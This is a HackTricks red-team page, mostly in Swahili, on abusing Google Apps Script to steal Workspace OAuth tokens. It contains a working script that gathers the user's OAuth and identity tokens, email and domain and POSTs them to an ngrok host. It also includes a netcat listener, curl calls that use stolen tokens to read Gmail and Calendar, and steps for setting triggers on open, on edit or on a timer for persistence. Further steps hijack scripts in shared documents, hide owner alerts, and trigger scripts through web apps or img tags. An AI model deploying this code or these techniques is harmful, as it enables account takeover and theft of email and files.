GWS - App Scripts

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

App Scripts

App Scripts ni kodhi ambayo itazinduliwa wakati mtumiaji mwenye ruhusa ya mhariri anapofikia hati ambayo App Script imeunganishwa nayo na baada ya kukubali ombi la OAuth. Zinaweza pia kuwekwa ili zitekelezwe kila wakati fulani na mmiliki wa App Script (Persistence).

Create App Script

Kuna njia kadhaa za kuunda App Script, ingawa njia maarufu zaidi ni kutoka kwa Hati ya Google (ya aina yoyote) na kama mradi huru:

Create a container-bound project from Google Docs, Sheets, or Slides

Fungua hati ya Docs, karatasi ya Sheets, au uwasilishaji wa Slides.
Bonyeza Extensions > Google Apps Script.
Katika mhariri wa skripti, bonyeza Untitled project.
Mpe mradi wako jina na bonyeza Rename.

Create a standalone project

Ili kuunda mradi huru kutoka Apps Script:

Nenda kwenye script.google.com.
Bonyeza New Project.
Katika mhariri wa skripti, bonyeza Untitled project.
Mpe mradi wako jina na bonyeza Rename.

Create a standalone project from Google Drive

Fungua Google Drive.
Bonyeza New > More > Google Apps Script.

Create a container-bound project from Google Forms

Fungua fomu katika Google Forms.
Bonyeza More more_vert > Script editor.
Katika mhariri wa skripti, bonyeza Untitled project.
Mpe mradi wako jina na bonyeza Rename.

Create a standalone project using the clasp command line tool

clasp ni zana ya mistari ya amri inayokuruhusu kuunda, kuvuta/kusukuma, na kupeleka miradi ya Apps Script kutoka terminal.

Tazama Command Line Interface using clasp guide kwa maelezo zaidi.

App Script Scenario

Create Google Sheet with App Script

Anza kwa kuunda App Script, mapendekezo yangu kwa ajili ya hali hii ni kuunda Google Sheet na nenda kwenye Extensions > App Scripts, hii itafungua App Script mpya kwako iliyounganishwa na karatasi.

Leak token

Ili kutoa ufikiaji wa token ya OAuth unahitaji kubonyeza Services + na kuongeza scopes kama:

AdminDirectory: Fikia watumiaji na vikundi vya directory (ikiwa mtumiaji ana ruhusa za kutosha)
Gmail: Ili kufikia data ya gmail
Drive: Ili kufikia data ya drive
Google Sheets API: Ili ifanye kazi na trigger

Ili kubadilisha scopes zinazohitajika unaweza kwenda kwenye mipangilio ya mradi na kuwezesha: Show "appsscript.json" manifest file in editor.

function getToken() {
var userEmail = Session.getActiveUser().getEmail();
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
var oauthToken = ScriptApp.getOAuthToken();
var identityToken = ScriptApp.getIdentityToken();

// Data json
data = {
"oauthToken": oauthToken,
"identityToken": identityToken,
"email": userEmail,
"domain": domain
}

// Send data
makePostRequest(data);

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = "";
page = AdminDirectory.Users.list({
domain: domain,  // Use the extracted domain
orderBy: 'givenName',
maxResults: 100,
pageToken: pageToken
});

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10);

// To ask for drive permissions
var files = DriveApp.getFiles();
}


function makePostRequest(data) {
var url = 'http://5.tcp.eu.ngrok.io:12027';

var options = {
'method' : 'post',
'contentType': 'application/json',
'payload' : JSON.stringify(data)
};

try {
UrlFetchApp.fetch(url, options);
} catch (e) {
Logger.log("Error making POST request: " + e.toString());
}
}

Ili kukamata ombi unaweza tu kukimbia:

ngrok tcp 4444
nc -lv 4444 #macOS

Permissions requested to execute the App Script:

Kama ombi la nje limefanywa, kuuliza ruhusa ya kufikia mwisho wa nje kutatokea pia.

Create Trigger

Mara tu App inaposomwa, bonyeza ⏰ Triggers ili kuunda trigger. Kama function ya kutekeleza chagua getToken, inakimbia wakati wa kutekeleza Head, katika chanzo cha tukio chagua From spreadsheet na aina ya tukio chagua On open au On edit (kulingana na mahitaji yako) na uhifadhi.

Kumbuka kwamba unaweza kuangalia kimbio za App Scripts katika tab ya Executions ikiwa unataka kufanyia kazi kitu.

Ili kuanzisha App Script mhanga anahitaji kuungana na Editor Access.

Token inayotumika kutekeleza App Script itakuwa ya mwandishi wa trigger, hata kama faili inafunguliwa kama Mhariri na watumiaji wengine.

Abusing Shared With Me documents

Ikiwa mtu amekushiriki hati yenye App Scripts na trigger inayotumia Head ya App Script (sio kutekelezwa kwa kudumu), unaweza kubadilisha msimbo wa App Script (kuongeza kwa mfano kazi za kuiba token), kuipata, na App Script itatekelezwa kwa ruhusa za mtumiaji aliyekushiriki hati hiyo! (kumbuka kwamba token ya OAuth ya wamiliki itakuwa na viwango vya ufikiaji vilivyotolewa wakati trigger ilipoundwa).

Taarifa itatumwa kwa mwandishi wa script ikionyesha kwamba mtu amebadilisha script (Je, kuhusu kutumia ruhusa za gmail kuunda kichujio kuzuia arifa?)

Ikiwa mshambuliaji anabadilisha viwango vya App Script masasisho hayatawekwa kwenye hati hadi trigger mpya yenye mabadiliko itakapotengenezwa. Hivyo, mshambuliaji hataweza kuiba token ya mwandishi mwenye wamiliki na viwango zaidi ya ile aliyoweka kwenye trigger aliyounda.

Unapounda kiungo cha kushiriki hati, kiungo kinachofanana na hiki kinaundwa: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit Ikiwa unabadilisha mwisho "/edit" kwa "/copy", badala ya kuipata google itakuuliza ikiwa unataka kuunda nakala ya hati:

Ikiwa mtumiaji ananakili na kuipata, maudhui ya hati na App Scripts vitanakiliwa, hata hivyo triggers hazitakiliwa, hivyo hakuna kitu kitakachotekelezwa.

Kumbuka kwamba pia inawezekana kushiriki App Script kama programu ya Mtandao (katika Mhariri wa App Script, tengeneza kama programu ya Mtandao), lakini arifa kama hii itatokea:

Ikifuatwa na kuuliza kwa kawaida ya OAuth kwa ruhusa zinazohitajika.

Testing

Unaweza kujaribu token iliyokusanywa ili orodhesha barua pepe na:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

Orodha ya kalenda ya mtumiaji:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

App Script kama Uthibitisho

Chaguo moja la uthibitisho lingekuwa kuunda hati na kuongeza kichocheo kwa kazi ya getToken na kushiriki hati hiyo na mshambuliaji ili kila wakati mshambuliaji anapofungua faili hiyo anatoa token ya mwathirika.

Pia inawezekana kuunda App Script na kufanya ikichochewe kila X wakati (kama kila dakika, saa, siku...). Mshambuliaji ambaye ana akili zilizovunjwa au kikao cha mwathirika anaweza kuweka kichocheo cha wakati cha App Script na kutoa token ya OAuth yenye mamlaka makubwa kila siku:

Tuunda App Script, nenda kwa Kichocheo, bonyeza Ongeza Kichocheo, na chagua kama chanzo cha tukio Kinasababishwa na Wakati na uchague chaguzi zinazokufaa zaidi:

Hii itaunda barua ya tahadhari ya usalama na ujumbe wa push kwa simu yako ikikujulisha kuhusu hili.

Kuepuka Kuthibitisha Hati Iliyo Shirikiwa

Zaidi ya hayo, ikiwa mtu amekushiriki hati yenye ufikiaji wa mhariri, unaweza kuunda App Scripts ndani ya hati hiyo na MMILIKI (mwandaji) wa hati hiyo atakuwa mmiliki wa App Script.

Hii inamaanisha, kwamba mwandaji wa hati atajitokeza kama mwandishi wa App Script yoyote ambayo mtu yeyote mwenye ufikiaji wa mhariri anaunda ndani yake.

Hii pia inamaanisha kwamba App Script itakuwa na imani na mazingira ya Workspace ya mwandishi wa hati hiyo.

Hii pia inamaanisha kwamba ikiwa App Script tayari ipo na watu wame pewa ufikiaji, mtu yeyote mwenye Uhariri ruhusa kwenye hati anaweza kuibadilisha na kutumia ufikiaji huo. Ili kutumia hii unahitaji pia watu kuchochea App Script. Na hila moja nzuri ni kuchapisha script kama programu ya wavuti. Wakati watu ambao tayari wamepewa ufikiaji kwa App Script wanapofikia ukurasa wa wavuti, watakuwa wakichochea App Script (hii pia inafanya kazi kwa kutumia <img> vitambulisho).